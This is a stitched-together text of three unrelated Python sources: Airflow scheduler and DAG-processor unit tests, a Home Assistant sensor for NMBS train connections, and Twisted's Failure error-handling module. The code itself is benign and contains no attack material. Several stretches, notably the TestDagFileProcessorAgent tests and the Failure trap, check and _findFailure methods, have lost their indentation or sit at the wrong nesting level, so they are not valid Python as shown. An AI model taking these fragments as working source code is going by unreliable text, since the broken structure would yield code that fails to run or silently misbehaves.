            session.add(local_job)
            session.add(ti)
            session.commit()
            # Backdate the last query time so _find_zombies actually runs.
            manager._last_zombie_query_time = timezone.utcnow() - timedelta(
                seconds=manager._zombie_threshold_secs + 1)
            manager._find_zombies()  # pylint: disable=no-value-for-parameter
            zombies = manager._zombies
            self.assertEqual(1, len(zombies))
            self.assertIsInstance(zombies[0], SimpleTaskInstance)
            self.assertEqual(ti.dag_id, zombies[0].dag_id)
            self.assertEqual(ti.task_id, zombies[0].task_id)
            self.assertEqual(ti.execution_date, zombies[0].execution_date)
            session.query(TI).delete()
            session.query(LJ).delete()
    def test_zombies_are_correctly_passed_to_dag_file_processor(self):
        """
        Check that the same set of zombies are passed to the dag
        file processors until the next zombie detection logic is invoked.
        """
        with conf_vars({('scheduler', 'max_threads'): '1',
                        ('core', 'load_examples'): 'False'}):
            dagbag = DagBag(os.path.join(TEST_DAG_FOLDER, 'test_example_bash_operator.py'))
            with create_session() as session:
                session.query(LJ).delete()
                dag = dagbag.get_dag('test_example_bash_operator')
                task = dag.get_task(task_id='run_this_last')
                ti = TI(task, DEFAULT_DATE, State.RUNNING)
                local_job = LJ(ti)
                local_job.state = State.SHUTDOWN
                local_job.id = 1
                ti.job_id = local_job.id
                session.add(local_job)
                session.add(ti)
                session.commit()
                fake_zombies = [SimpleTaskInstance(ti)]
            class FakeDagFileProcessorRunner(DagFileProcessorProcess):
                # This fake processor will return the zombies it received in constructor
                # as its processing result w/o actually parsing anything.
                def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
                    super().__init__(file_path, pickle_dags, dag_id_white_list, zombies)
                    self._result = zombies, 0
                def start(self):
                    # No subprocess is spawned; the "result" is preloaded.
                    pass
                @property
                def start_time(self):
                    return DEFAULT_DATE
                @property
                def pid(self):
                    return 1234
                @property
                def done(self):
                    return True
                @property
                def result(self):
                    return self._result
            def processor_factory(file_path, zombies):
                # Factory signature expected by DagFileProcessorAgent.
                return FakeDagFileProcessorRunner(
                    file_path,
                    False,
                    [],
                    zombies
                )
            test_dag_path = os.path.join(TEST_DAG_FOLDER,
                                         'test_example_bash_operator.py')
            async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
            processor_agent = DagFileProcessorAgent(test_dag_path,
                                                    [],
                                                    1,
                                                    processor_factory,
                                                    timedelta.max,
                                                    async_mode)
            processor_agent.start()
            parsing_result = []
            if not async_mode:
                processor_agent.heartbeat()
            while not processor_agent.done:
                if not async_mode:
                    processor_agent.wait_until_finished()
                parsing_result.extend(processor_agent.harvest_simple_dags())
            # The fake processor must hand back exactly the zombies found.
            self.assertEqual(len(fake_zombies), len(parsing_result))
            self.assertEqual(set(zombie.key for zombie in fake_zombies),
                             set(result.key for result in parsing_result))
    @mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
    @mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.kill")
    def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
        """A processor started in the distant past exceeds the 5s timeout
        and must be killed."""
        mock_pid.return_value = 1234
        manager = DagFileProcessorManager(
            dag_directory='directory',
            file_paths=['abc.txt'],
            max_runs=1,
            processor_factory=MagicMock().return_value,
            processor_timeout=timedelta(seconds=5),
            signal_conn=MagicMock(),
            async_mode=True)
        processor = DagFileProcessorProcess('abc.txt', False, [], [])
        processor._start_time = timezone.make_aware(datetime.min)
        manager._processors = {'abc.txt': processor}
        manager._kill_timed_out_processors()
        mock_kill.assert_called_once_with()
    @mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
    @mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess")
    def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
        """A processor started in the far future is within its timeout and
        must not be killed."""
        mock_pid.return_value = 1234
        manager = DagFileProcessorManager(
            dag_directory='directory',
            file_paths=['abc.txt'],
            max_runs=1,
            processor_factory=MagicMock().return_value,
            processor_timeout=timedelta(seconds=5),
            signal_conn=MagicMock(),
            async_mode=True)
        processor = DagFileProcessorProcess('abc.txt', False, [], [])
        processor._start_time = timezone.make_aware(datetime.max)
        manager._processors = {'abc.txt': processor}
        manager._kill_timed_out_processors()
        mock_dag_file_processor.kill.assert_not_called()
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
for mod in sys.modules:
if mod not in self.old_modules:
del sys.modules[mod]
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(file_path,
False,
[],
zombies)
test_dag_path = os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path,
[],
0,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
if not async_mode:
processor_agent.heartbeat()
processor_agent._process.join()
# Since we are reloading logging config not creating this file,
# we should expect it to be nonexistent.
self.assertFalse(os.path.isfile(log_file_loc))
def test_parse_once(self):
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(file_path,
False,
[],
zombies)
test_dag_path = os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path,
[test_dag_path],
1,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
parsing_result = []
if not async_mode:
processor_agent.heartbeat()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
parsing_result.extend(processor_agent.harvest_simple_dags())
dag_ids = [result.dag_id for result in parsing_result]
self.assertEqual(dag_ids.count('test_start_date_scheduling'), 1)
def test_launch_process(self):
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(file_path,
False,
[],
zombies)
test_dag_path = os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path,
[],
0,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
if not async_mode:
processor_agent.heartbeat()
processor_agent._process.join()
self.assertTrue(os.path.isfile(log_file_loc))
class TestCorrectMaybeZipped(unittest.TestCase):
    """Tests for correct_maybe_zipped's handling of plain vs zipped paths."""

    @mock.patch("zipfile.is_zipfile")
    def test_correct_maybe_zipped_normal_file(self, mocked_is_zipfile):
        """A plain file path is returned unchanged."""
        mocked_is_zipfile.return_value = False
        path = '/path/to/some/file.txt'
        self.assertEqual(correct_maybe_zipped(path), path)

    @mock.patch("zipfile.is_zipfile")
    def test_correct_maybe_zipped_normal_file_with_zip_in_name(self, mocked_is_zipfile):
        """'.zip' appearing inside a directory name must not trigger truncation."""
        mocked_is_zipfile.return_value = False
        path = '/path/to/fakearchive.zip.other/file.txt'
        self.assertEqual(correct_maybe_zipped(path), path)

    @mock.patch("zipfile.is_zipfile")
    def test_correct_maybe_zipped_archive(self, mocked_is_zipfile):
        """A path inside a real archive is truncated to the archive itself."""
        mocked_is_zipfile.return_value = True
        path = '/path/to/archive.zip/deep/path/to/file.txt'
        dag_folder = correct_maybe_zipped(path)
        # The zip probe must run exactly once, against the archive prefix.
        self.assertEqual(mocked_is_zipfile.call_count, 1)
        args, _ = mocked_is_zipfile.call_args_list[0]
        self.assertEqual(args[0], '/path/to/archive.zip')
        self.assertEqual(dag_folder, '/path/to/archive.zip')
| |
"""
Get ride details and liveboard details for NMBS (Belgian railway).
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.nmbs/
"""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, ATTR_LATITUDE, ATTR_LONGITUDE, CONF_NAME,
CONF_SHOW_ON_MAP)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'NMBS'
# Default train icon; the alert variant is shown whenever a delay > 0.
DEFAULT_ICON = "mdi:train"
DEFAULT_ICON_ALERT = "mdi:alert-octagon"
# Configuration keys accepted by this platform.
CONF_STATION_FROM = 'station_from'
CONF_STATION_TO = 'station_to'
CONF_STATION_LIVE = 'station_live'
CONF_EXCLUDE_VIAS = 'exclude_vias'
# Third-party client for the iRail API.
REQUIREMENTS = ["pyrail==0.0.3"]
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_STATION_FROM): cv.string,
    vol.Required(CONF_STATION_TO): cv.string,
    vol.Optional(CONF_STATION_LIVE): cv.string,
    vol.Optional(CONF_EXCLUDE_VIAS, default=False): cv.boolean,
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    vol.Optional(CONF_SHOW_ON_MAP, default=False): cv.boolean,
})
def get_time_until(departure_time=None):
    """Return whole minutes from now until *departure_time*.

    *departure_time* is a UNIX timestamp; ``None`` yields 0.
    """
    if departure_time is None:
        return 0
    remaining = dt_util.utc_from_timestamp(int(departure_time)) - dt_util.now()
    return round(remaining.total_seconds() / 60)
def get_delay_in_minutes(delay=0):
    """Convert a delay expressed in seconds to (rounded) whole minutes."""
    seconds = int(delay)
    return round(seconds / 60)
def get_ride_duration(departure_time, arrival_time, delay=0):
    """Return the total travel time in minutes, including any delay.

    Departure/arrival are UNIX timestamps; *delay* is in seconds.
    """
    departure = dt_util.utc_from_timestamp(int(departure_time))
    arrival = dt_util.utc_from_timestamp(int(arrival_time))
    scheduled_minutes = int(round((arrival - departure).total_seconds() / 60))
    return scheduled_minutes + get_delay_in_minutes(delay)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the NMBS sensor with iRail API."""
    from pyrail import iRail
    api_client = iRail()
    excl_vias = config[CONF_EXCLUDE_VIAS]
    name = config[CONF_NAME]
    show_on_map = config[CONF_SHOW_ON_MAP]
    station_from = config[CONF_STATION_FROM]
    station_live = config.get(CONF_STATION_LIVE)
    station_to = config[CONF_STATION_TO]
    sensors = [
        NMBSSensor(api_client, name, show_on_map,
                   station_from, station_to, excl_vias)
    ]
    # The liveboard sensor is optional; only add it when configured.
    if station_live is not None:
        sensors.append(NMBSLiveBoard(api_client, station_live))
    add_entities(sensors, True)
class NMBSLiveBoard(Entity):
    """Sensor exposing the next departure on a station's liveboard."""

    def __init__(self, api_client, live_station):
        """Initialize the liveboard sensor."""
        self._api_client = api_client
        self._station = live_station
        self._attrs = {}
        self._state = None

    @property
    def name(self):
        """Return the sensor default name."""
        return "NMBS Live"

    @property
    def icon(self):
        """Return an alert icon while a delay is reported, else the default."""
        delayed = bool(self._attrs) and int(self._attrs['delay']) > 0
        return DEFAULT_ICON_ALERT if delayed else DEFAULT_ICON

    @property
    def state(self):
        """Return sensor state."""
        return self._state

    @property
    def device_state_attributes(self):
        """Return the sensor attributes if data is available."""
        if self._state is None or not self._attrs:
            return None
        attrs = {
            'departure': "In {} minutes".format(
                get_time_until(self._attrs['time'])),
            'extra_train': int(self._attrs['isExtra']) > 0,
            'vehicle_id': self._attrs['vehicle'],
            'monitored_station': self._station,
            ATTR_ATTRIBUTION: "https://api.irail.be/",
        }
        # Only surface the delay attribute when there actually is one.
        delay = get_delay_in_minutes(self._attrs["delay"])
        if delay > 0:
            attrs['delay'] = "{} minutes".format(delay)
        return attrs

    def update(self):
        """Fetch the liveboard and expose its first departure."""
        board = self._api_client.get_liveboard(self._station)
        upcoming = board['departures']['departure'][0]
        self._attrs = upcoming
        self._state = "Track {} - {}".format(
            upcoming['platform'], upcoming['station'])
class NMBSSensor(Entity):
    """Sensor reporting the total travel time for a configured connection."""

    def __init__(self, api_client, name, show_on_map,
                 station_from, station_to, excl_vias):
        """Initialize the NMBS connection sensor."""
        self._api_client = api_client
        self._name = name
        self._show_on_map = show_on_map
        self._station_from = station_from
        self._station_to = station_to
        self._excl_vias = excl_vias
        self._attrs = {}
        self._state = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement."""
        return 'min'

    @property
    def icon(self):
        """Return an alert icon when the departure is delayed."""
        if self._attrs:
            if get_delay_in_minutes(self._attrs['departure']['delay']) > 0:
                return "mdi:alert-octagon"
        return "mdi:train"

    @property
    def device_state_attributes(self):
        """Return sensor attributes if data is available."""
        if self._state is None or not self._attrs:
            return None
        departure_info = self._attrs['departure']
        attrs = {
            'departure': "In {} minutes".format(
                get_time_until(departure_info['time'])),
            'destination': self._station_to,
            'direction': departure_info['direction']['name'],
            "platform_arriving": self._attrs['arrival']['platform'],
            "platform_departing": departure_info['platform'],
            "vehicle_id": departure_info['vehicle'],
            ATTR_ATTRIBUTION: "https://api.irail.be/",
        }
        if self._show_on_map and self.station_coordinates:
            attrs[ATTR_LATITUDE], attrs[ATTR_LONGITUDE] = self.station_coordinates
        if self.is_via_connection and not self._excl_vias:
            # Describe the first intermediate stop of the connection.
            via = self._attrs['vias']['via'][0]
            attrs['via'] = via['station']
            attrs['via_arrival_platform'] = via['arrival']['platform']
            attrs['via_transfer_platform'] = via['departure']['platform']
            attrs['via_transfer_time'] = (
                get_delay_in_minutes(via['timeBetween'])
                + get_delay_in_minutes(via['departure']['delay']))
        delay = get_delay_in_minutes(departure_info['delay'])
        if delay > 0:
            attrs['delay'] = "{} minutes".format(delay)
        return attrs

    @property
    def state(self):
        """Return the state of the device."""
        return self._state

    @property
    def station_coordinates(self):
        """Return [lat, lon] of the departure station, or [] before data."""
        if self._state is None or not self._attrs:
            return []
        info = self._attrs['departure']['stationinfo']
        return [float(info['locationY']), float(info['locationX'])]

    @property
    def is_via_connection(self):
        """Return whether the connection goes through another station."""
        if not self._attrs:
            return False
        return 'vias' in self._attrs and int(self._attrs['vias']['number']) > 0

    def update(self):
        """Set the state to the duration of the next connection."""
        connections = self._api_client.get_connections(
            self._station_from, self._station_to)
        first = connections['connection'][0]
        # Skip a connection that has already departed.
        if int(first['departure']['left']) > 0:
            next_connection = connections['connection'][1]
        else:
            next_connection = first
        self._attrs = next_connection
        if self._excl_vias and self.is_via_connection:
            _LOGGER.debug("Skipping update of NMBSSensor \
                because this connection is a via")
            return
        self._state = get_ride_duration(
            next_connection['departure']['time'],
            next_connection['arrival']['time'],
            next_connection['departure']['delay'],
        )
| |
# -*- test-case-name: twisted.test.test_failure -*-
# See also test suite twisted.test.test_pbfailure
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Asynchronous-friendly error mechanism.
See L{Failure}.
"""
# System Imports
import sys
import linecache
import inspect
import opcode
from cStringIO import StringIO
import reflect
# Running total of Failure instances created; each Failure stamps itself
# with this ordinal in __init__ (self.count).
count = 0
# NOTE(review): not referenced anywhere in this chunk -- presumably used
# elsewhere to limit captured stack depth; confirm before removing.
traceupLength = 4
class DefaultException(Exception):
    """Exception used to wrap a bare string handed to L{Failure}."""
def format_frames(frames, write, detail="default"):
    """Format and write frames.
    @param frames: is a list of frames as used by Failure.frames, with
        each frame being a list of
        (funcName, fileName, lineNumber, locals.items(), globals.items())
    @type frames: list
    @param write: this will be called with formatted strings.
    @type write: callable
    @param detail: Three detail levels are available:
        default, brief, and verbose.
        "brief" emits one file:line:method line per frame; "default"
        mimics standard traceback output; "verbose" also dumps each
        frame's captured locals and globals.
    @type detail: string
    """
    if detail not in ('default', 'brief', 'verbose'):
        # Python 2 raise-statement syntax (this module predates Python 3).
        raise ValueError, "Detail must be default, brief, or verbose. (not %r)" % (detail,)
    w = write
    if detail == "brief":
        for method, filename, lineno, localVars, globalVars in frames:
            w('%s:%s:%s\n' % (filename, lineno, method))
    elif detail == "default":
        for method, filename, lineno, localVars, globalVars in frames:
            w( '  File "%s", line %s, in %s\n' % (filename, lineno, method))
            # Show the source line itself, as the stdlib traceback does.
            w( '    %s\n' % linecache.getline(filename, lineno).strip())
    elif detail == "verbose":
        for method, filename, lineno, localVars, globalVars in frames:
            w("%s:%d: %s(...)\n" % (filename, lineno, method))
            w(' [ Locals ]\n')
            # Note: the repr(val) was (self.pickled and val) or repr(val)))
            for name, val in localVars:
                w("  %s : %s\n" %  (name, repr(val)))
            w(' ( Globals )\n')
            for name, val in globalVars:
                w("  %s : %s\n" %  (name, repr(val)))
# slyphon: i have a need to check for this value in trial
# so I made it a module-level constant
# Marker line inserted into formatted tracebacks at the point where the
# exception was captured by a Failure.
EXCEPTION_CAUGHT_HERE = "--- <exception caught here> ---"
class NoCurrentExceptionError(Exception):
    """
    Raised when a Failure is built from the interpreter's current exception
    state but no exception is actually being handled.
    """
class _Traceback(object):
    """
    Fake traceback object which can be passed to functions in the standard
    library L{traceback} module.
    """

    def __init__(self, frames):
        """
        Build a linked chain of fake traceback objects from a frame list.

        The locals/globals carried in each frame tuple are discarded:
        standard traceback rendering never consults them.

        @param frames: [(methodname, filename, lineno, locals, globals), ...]
        """
        assert len(frames) > 0, "Must pass some frames"
        name, filename, lineno, localz, globalz = frames[0]
        remaining = frames[1:]
        self.tb_frame = _Frame(name, filename)
        self.tb_lineno = lineno
        # Recurse to chain the rest of the frames via tb_next.
        self.tb_next = _Traceback(remaining) if remaining else None
class _Frame(object):
    """
    A fake frame object, used by L{_Traceback}.
    """

    def __init__(self, name, filename):
        """
        Create a frame whose code object reports C{name} and C{filename}.
        """
        self.f_globals = {}
        self.f_code = _Code(name, filename)
class _Code(object):
"""
A fake code object, used by L{_Traceback} via L{_Frame}.
"""
def __init__(self, name, filename):
self.co_name = name
self.co_filename = filename
class Failure:
    """A basic abstraction for an error that has occurred.
    This is necessary because Python's built-in error mechanisms are
    inconvenient for asynchronous communication.
    @ivar value: The exception instance responsible for this failure.
    @ivar type: The exception's class.
    """
    # NOTE(review): inferred from the name and the comment in format_frames
    # -- appears to flag a Failure reconstructed from a pickle; the pickling
    # code is outside this chunk, confirm there.
    pickled = 0
    # Overridden per-instance in __init__ with the captured caller stack.
    stack = None
    # The opcode of "yield" in Python bytecode. We need this in _findFailure in
    # order to identify whether an exception was thrown by a
    # throwExceptionIntoGenerator.
    _yieldOpcode = chr(opcode.opmap["YIELD_VALUE"])
    def __init__(self, exc_value=None, exc_type=None, exc_tb=None):
        """Initialize me with an explanation of the error.
        By default, this will use the current X{exception}
        (L{sys.exc_info}()). However, if you want to specify a
        particular kind of failure, you can pass an exception as an
        argument.
        If no C{exc_value} is passed, then an "original" Failure will
        be searched for. If the current exception handler that this
        Failure is being constructed in is handling an exception
        raised by L{raiseException}, then this Failure will act like
        the original Failure.
        Note: this module is Python 2 code (C{unicode}, C{dict.has_key},
        three-argument raise); the captured frame data mirrors that era.
        """
        global count
        count = count + 1
        # Creation ordinal, useful when debugging Failure lifetimes.
        self.count = count
        self.type = self.value = tb = None
        #strings Exceptions/Failures are bad, mmkay?
        if isinstance(exc_value, (str, unicode)) and exc_type is None:
            import warnings
            warnings.warn(
                "Don't pass strings (like %r) to failure.Failure (replacing with a DefaultException)." %
                exc_value, DeprecationWarning, stacklevel=2)
            exc_value = DefaultException(exc_value)
        stackOffset = 0
        if exc_value is None:
            # Adopt the original Failure if we're handling a re-raise.
            exc_value = self._findFailure()
        if exc_value is None:
            self.type, self.value, tb = sys.exc_info()
            if self.type is None:
                raise NoCurrentExceptionError()
            # Skip this __init__ frame when capturing the caller stack.
            stackOffset = 1
        elif exc_type is None:
            if isinstance(exc_value, Exception):
                self.type = exc_value.__class__
            else: #allow arbitrary objects.
                self.type = type(exc_value)
            self.value = exc_value
        else:
            self.type = exc_type
            self.value = exc_value
        if isinstance(self.value, Failure):
            # Become a transparent copy of the wrapped Failure.
            self.__dict__ = self.value.__dict__
            return
        if tb is None:
            if exc_tb:
                tb = exc_tb
#             else:
#                 log.msg("Erf, %r created with no traceback, %s %s." % (
#                     repr(self), repr(exc_value), repr(exc_type)))
#                 for s in traceback.format_stack():
#                     log.msg(s)
        frames = self.frames = []
        stack = self.stack = []
        # added 2003-06-23 by Chris Armstrong. Yes, I actually have a
        # use case where I need this traceback object, and I've made
        # sure that it'll be cleaned up.
        self.tb = tb
        if tb:
            f = tb.tb_frame
        elif not isinstance(self.value, Failure):
            # we don't do frame introspection since it's expensive,
            # and if we were passed a plain exception with no
            # traceback, it's not useful anyway
            f = stackOffset = None
        while stackOffset and f:
            # This excludes this Failure.__init__ frame from the
            # stack, leaving it to start with our caller instead.
            f = f.f_back
            stackOffset -= 1
        # Keeps the *full* stack.  Formerly in spread.pb.print_excFullStack:
        #
        #   The need for this function arises from the fact that several
        #   PB classes have the peculiar habit of discarding exceptions
        #   with bareword "except:"s.  This premature exception
        #   catching means tracebacks generated here don't tend to show
        #   what called upon the PB object.
        while f:
            localz = f.f_locals.copy()
            if f.f_locals is f.f_globals:
                globalz = {}
            else:
                globalz = f.f_globals.copy()
            for d in globalz, localz:
                # __builtins__ is huge and never interesting; drop it.
                if d.has_key("__builtins__"):
                    del d["__builtins__"]
            stack.insert(0, [
                f.f_code.co_name,
                f.f_code.co_filename,
                f.f_lineno,
                localz.items(),
                globalz.items(),
                ])
            f = f.f_back
        # Same capture, but for the traceback frames below the catch point.
        while tb is not None:
            f = tb.tb_frame
            localz = f.f_locals.copy()
            if f.f_locals is f.f_globals:
                globalz = {}
            else:
                globalz = f.f_globals.copy()
            for d in globalz, localz:
                if d.has_key("__builtins__"):
                    del d["__builtins__"]
            frames.append([
                f.f_code.co_name,
                f.f_code.co_filename,
                tb.tb_lineno,
                localz.items(),
                globalz.items(),
                ])
            tb = tb.tb_next
        if inspect.isclass(self.type) and issubclass(self.type, Exception):
            # Record the full base-class chain (as qualified names) so
            # check()/trap() can match on ancestors too.
            parentCs = reflect.allYourBase(self.type)
            self.parents = map(reflect.qual, parentCs)
            self.parents.append(reflect.qual(self.type))
        else:
            self.parents = [self.type]
def trap(self, *errorTypes):
"""Trap this failure if its type is in a predetermined list.
This allows you to trap a Failure in an error callback. It will be
automatically re-raised if it is not a type that you expect.
The reason for having this particular API is because it's very useful
in Deferred errback chains:
| def _ebFoo(self, failure):
| r = failure.trap(Spam, Eggs)
| print 'The Failure is due to either Spam or Eggs!'
| if r == Spam:
| print 'Spam did it!'
| elif r == Eggs:
| print 'Eggs did it!'
If the failure is not a Spam or an Eggs, then the Failure
will be 'passed on' to the next errback.
@type errorTypes: L{Exception}
"""
error = self.check(*errorTypes)
if not error:
raise self
return error
def check(self, *errorTypes):
"""Check if this failure's type is in a predetermined list.
@type errorTypes: list of L{Exception} classes or
fully-qualified class names.
@returns: the matching L{Exception} type, or None if no match.
"""
for error in errorTypes:
err = error
if inspect.isclass(error) and issubclass(error, Exception):
err = reflect.qual(error)
if err in self.parents:
return error
return None
    def raiseException(self):
        """
        raise the original exception, preserving traceback
        information if available.
        """
        # Python 2 three-argument raise: re-raises self.value with the
        # captured traceback so the original frames stay visible.
        raise self.type, self.value, self.tb
def throwExceptionIntoGenerator(self, g):
"""
Throw the original exception into the given generator,
preserving traceback information if available.
@return: The next value yielded from the generator.
@raise StopIteration: If there are no more values in the generator.
@raise anything else: Anything that the generator raises.
"""
return g.throw(self.type, self.value, self.tb)
def _findFailure(cls):
    """
    Find the failure that represents the exception currently in context.

    Walks the current traceback (sys.exc_info()) looking for the two
    internal re-raise paths — raiseException and
    throwExceptionIntoGenerator — and, when one is recognised, returns
    the original Failure instance held by that frame's ``self`` local.
    Returns None when the exception did not pass through either path.

    NOTE(review): relies on Python 2 function attributes (``func_code``)
    and on ``cls._yieldOpcode`` defined elsewhere in this class.
    """
    tb = sys.exc_info()[-1]
    if not tb:
        # No exception is being handled at all.
        return
    # Find the deepest traceback entry and remember the one above it.
    secondLastTb = None
    lastTb = tb
    while lastTb.tb_next:
        secondLastTb = lastTb
        lastTb = lastTb.tb_next
    lastFrame = lastTb.tb_frame
    # NOTE: f_locals.get('self') is used rather than
    # f_locals['self'] because psyco frames do not contain
    # anything in their locals() dicts. psyco makes debugging
    # difficult anyhow, so losing the Failure objects (and thus
    # the tracebacks) here when it is used is not that big a deal.
    # handle raiseException-originated exceptions
    if lastFrame.f_code is cls.raiseException.func_code:
        return lastFrame.f_locals.get('self')
    # handle throwExceptionIntoGenerator-originated exceptions
    # this is tricky, and differs if the exception was caught
    # inside the generator, or above it:
    # it is only really originating from
    # throwExceptionIntoGenerator if the bottom of the traceback
    # is a yield.
    # Pyrex and Cython extensions create traceback frames
    # with no co_code, but they can't yield so we know it's okay to just return here.
    if ((not lastFrame.f_code.co_code) or
        lastFrame.f_code.co_code[lastTb.tb_lasti] != cls._yieldOpcode):
        return
    # if the exception was caught above the generator.throw
    # (outside the generator), it will appear in the tb (as the
    # second last item):
    if secondLastTb:
        frame = secondLastTb.tb_frame
        if frame.f_code is cls.throwExceptionIntoGenerator.func_code:
            return frame.f_locals.get('self')
    # if the exception was caught below the generator.throw
    # (inside the generator), it will appear in the frames' linked
    # list, above the top-level traceback item (which must be the
    # generator frame itself, thus its caller is
    # throwExceptionIntoGenerator).
    frame = tb.tb_frame.f_back
    if frame and frame.f_code is cls.throwExceptionIntoGenerator.func_code:
        return frame.f_locals.get('self')
_findFailure = classmethod(_findFailure)
def __repr__(self):
    """Machine-readable summary: the Failure class and the wrapped exception type."""
    return "<{0} {1}>".format(self.__class__, self.type)
def __str__(self):
    """Human-readable one-liner built from the brief traceback."""
    return "[Failure instance: {0}]".format(self.getBriefTraceback())
def __getstate__(self):
    """Avoid pickling objects in the traceback.

    Every captured local/global value in self.frames (and self.stack,
    when present) is replaced by its safe_repr string, and the live
    traceback object is dropped.
    """
    if self.pickled:
        return self.__dict__

    def scrub(capturedFrames):
        # Replace each captured value with a repr string so the state
        # holds no references to live objects.
        return [
            [funcName, fileName, lineNumber,
             [(name, reflect.safe_repr(value)) for (name, value) in localVars],
             [(name, reflect.safe_repr(value)) for (name, value) in globalVars]]
            for (funcName, fileName, lineNumber, localVars, globalVars)
            in capturedFrames
        ]

    state = self.__dict__.copy()
    state['frames'] = scrub(self.frames)
    # added 2003-06-23. See comment above in __init__
    state['tb'] = None
    if self.stack is not None:
        # XXX: This is a band-aid. I can't figure out where these
        # (failure.stack is None) instances are coming from.
        state['stack'] = scrub(self.stack)
    state['pickled'] = 1
    return state
def cleanFailure(self):
    """Remove references to other objects, replacing them with strings."""
    scrubbed = self.__getstate__()
    self.__dict__ = scrubbed
def getTracebackObject(self):
    """
    Get an object that represents this Failure's stack that can be passed
    to traceback.extract_tb.

    If the original traceback object is still present, return that. If this
    traceback object has been lost but we still have the information,
    return a fake traceback object (see L{_Traceback}). If there is no
    traceback information at all, return None.
    """
    if self.tb is not None:
        return self.tb
    if self.frames:
        return _Traceback(self.frames)
    return None
def getErrorMessage(self):
    """Get a string of the exception which caused this Failure."""
    wrapped = self.value
    # A chained Failure delegates to the innermost one.
    if isinstance(wrapped, Failure):
        return wrapped.getErrorMessage()
    return reflect.safe_str(wrapped)
def getBriefTraceback(self):
    """Return the brief-style traceback as a string."""
    buf = StringIO()
    self.printBriefTraceback(file=buf)
    return buf.getvalue()
def getTraceback(self, elideFrameworkCode=0, detail='default'):
    """Return the formatted traceback as a string (see printTraceback)."""
    buf = StringIO()
    self.printTraceback(file=buf,
                        elideFrameworkCode=elideFrameworkCode,
                        detail=detail)
    return buf.getvalue()
def printTraceback(self, file=None, elideFrameworkCode=0, detail='default'):
    """Emulate Python's standard error reporting mechanism.

    @param file: file-like object to write to; defaults to sys.stderr.
    @param elideFrameworkCode: when true, skip printing the captured stack
        above the catch point and the EXCEPTION_CAUGHT_HERE marker.
    @param detail: one of 'default', 'brief' or 'verbose'.
    """
    if file is None:
        #file = log.logerr
        file = sys.stderr # changed by teratorn
    w = file.write
    # Preamble
    if detail == 'verbose':
        w( '*--- Failure #%d%s---\n' %
           (self.count,
            (self.pickled and ' (pickled) ') or ' '))
    elif detail == 'brief':
        if self.frames:
            hasFrames = 'Traceback'
        else:
            hasFrames = 'Traceback (failure with no frames)'
        w("%s: %s: %s\n" % (hasFrames, self.type, self.value))
    else:
        w( 'Traceback (most recent call last):\n')
    # Frames, formatted in appropriate style
    if self.frames:
        if not elideFrameworkCode:
            format_frames(self.stack[-traceupLength:], w, detail)
            w("%s\n" % (EXCEPTION_CAUGHT_HERE,))
        format_frames(self.frames, w, detail)
    elif not detail == 'brief':
        # Yeah, it's not really a traceback, despite looking like one...
        w("Failure: ")
    # postamble, if any
    if not detail == 'brief':
        # Unfortunately, self.type will not be a class object if this
        # Failure was created implicitly from a string exception.
        # qual() doesn't make any sense on a string, so check for this
        # case here and just write out the string if that's what we
        # have.
        # NOTE(review): `unicode` makes this Python 2 only.
        if isinstance(self.type, (str, unicode)):
            w(self.type + "\n")
        else:
            w("%s: %s\n" % (reflect.qual(self.type),
                            reflect.safe_str(self.value)))
    # chaining
    if isinstance(self.value, Failure):
        # TODO: indentation for chained failures?
        file.write(" (chained Failure)\n")
        self.value.printTraceback(file, elideFrameworkCode, detail)
    if detail == 'verbose':
        w('*--- End of Failure #%d ---\n' % self.count)
